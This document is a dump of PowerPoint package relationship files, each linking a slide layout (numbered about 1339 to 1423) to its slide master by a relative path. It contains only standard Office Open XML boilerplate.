<file path=ppt/slideLayouts/_rels/slideLayout1339.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster134.xml"/></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340.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster134.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1341.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1342.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1343.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1344.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1345.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1346.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1347.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1348.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1349.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></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350.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster135.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1351.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1352.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1353.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1354.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1355.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1356.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1357.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1358.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1359.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout136.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360.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster136.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1361.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1362.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1363.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1364.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1365.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1366.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1367.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1368.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1369.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout137.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370.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster137.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1371.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1372.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1373.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1374.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1375.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1376.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1377.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1378.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1379.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout138.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380.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster138.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1381.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1382.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1383.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1384.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1385.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1386.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1387.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1388.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1389.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout139.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390.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster139.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1391.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1392.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1393.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1394.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1395.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1396.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1397.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1398.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1399.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.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0.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00.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster140.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1401.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1402.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1403.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1404.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1405.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1406.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1407.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1408.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1409.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout141.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410.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster141.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1411.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1412.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1413.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1414.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1415.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1416.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1417.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1418.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1419.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout142.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420.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster142.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1421.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster143.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1422.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster143.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1423.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster143.xml"/></Relationships>
</file>

